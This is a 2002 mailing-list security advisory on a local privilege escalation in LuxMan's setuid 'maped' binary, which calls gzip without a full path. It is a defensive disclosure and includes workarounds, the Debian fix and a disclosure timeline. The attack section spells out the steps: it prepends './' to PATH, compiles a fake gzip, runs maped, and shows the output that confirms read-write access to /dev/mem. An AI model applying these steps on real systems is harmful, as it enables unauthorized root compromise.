[UNIX] Non-Explicit Path Vulnerability in LuxMan

From: support@securiteam.com
Date: 11/06/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 6 Nov 2002 19:43:47 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Non-Explicit Path Vulnerability in LuxMan
------------------------------------------------------------------------

SUMMARY

 <http://packages.debian.org/stable/games/luxman.html> Frank McIngvale's
LuxMan is a Linux-based game similar to Pac Man. A vulnerability in the
product allows local attackers to gain elevated privileges.

DETAILS

Maped is a setuid binary that belongs to LuxMan. It executes gzip without
using the full path. A local attacker can create an exploit binary named
gzip and have maped execute it by properly modifying the path environment
variable. The following is a sample run and explanation of an exploit that
will duplicate /dev/mem to /tmp/mem:

First, the attacker sets the current working directory into the path
environment variable:

farmer@debian30:~$ export | grep PATH declare -x
PATH="/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
farmer@debian30:~$ declare -x
PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
farmer@debian30:~$ export | grep PATH declare -x
PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"

Second, the attacker compiles the exploit as a binary named gzip and
creates a fake archive:

farmer@debian30:~$ cc gzip.c -o gzip
farmer@debian30:~$ touch test.gz

Third, the attacker executes the maped binary:

farmer@debian30:~$ `which maped` test.gz

You must be the owner of the current console to use svgalib. Not running
in a graphics capable console, and unable to find one. Using VGA driver.

svgalib 1.4.3
..

At this point, /dev/mem is being duplicated into /dev/tmp. The descriptor
to /dev/mem can be analyzed in a separate terminal:

farmer@debian30:~$ lsof | grep /dev/mem gzip 5197 farmer 5u CHR 1,1 178294
/dev/mem

farmer@debian30:~$ cd /proc/5197/fd/
farmer@debian30:~$ ls -l
total 0
lrwx------ 1 farmer farmer 64 Oct 10 05:56 0 -> /dev/pts/1
l-wx------ 1 farmer farmer 64 Oct 10 05:56 1 -> pipe:[4991]
lrwx------ 1 farmer farmer 64 Oct 10 05:56 2 -> /dev/pts/1
lrwx------ 1 farmer farmer 64 Oct 10 05:56 3 -> /tmp/mem
lr-x------ 1 farmer farmer 64 Oct 10 05:56 4 -> /dev/zero
lrwx------ 1 farmer farmer 64 Oct 10 05:56 5 -> /dev/mem

It is clear that descriptor 5 is a read write descriptor to /dev/mem.

Analysis:
Any local user can launch this attack to gain read/write access to
/dev/mem. Such access can lead to local root compromise. Exploitation is
possible by scanning the file for fragments of the master password file
and modifying kernel memory to re-map system calls.

Detection:
LuxMan 0.41, which is packaged and distributed with Debian Linux 3.0r0, is
vulnerable. It is probable that the same LuxMan version is vulnerable on
other platforms as well.

Workaround:
Customers should consider one of the two following options:

Option 1: Remove the LuxMan package by issuing the command "# apt-get
remove luxman".

Option 2: Remove the setuid bit from the maped binary by executing the
command "# chmod -s `which maped`".

Vendor response:
The Debian Project has made available an updated LuxMan package that fixes
this vulnerability. More information should be available in DSA-189 at
<http://www.debian.org/security/2002/dsa-189>
http://www.debian.org/security/2002/dsa-189 .
 
Disclosure timeline:
10/03/2002 Issue disclosed to iDEFENSE
10/31/2002 Maintainer, Janos Lenart (ocsi@debian.org), and
security@debian.org notified
10/31/2002 iDEFENSE clients notified
11/02/2002 Responses received from ocsi@debian.org and
<mailto:joey@infodrom.org> Martin Schulze
11/06/2002 Public disclosure

ADDITIONAL INFORMATION

The original advisory can be downloaded by to:
 <http://www.idefense.com/advisory/11.06.02.txt>
http://www.idefense.com/advisory/11.06.02.txt

The information has been provided by <mailto:dendler@idefense.com> David
Endler of iDEFENSE, the vulnerability was found by Texonet.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages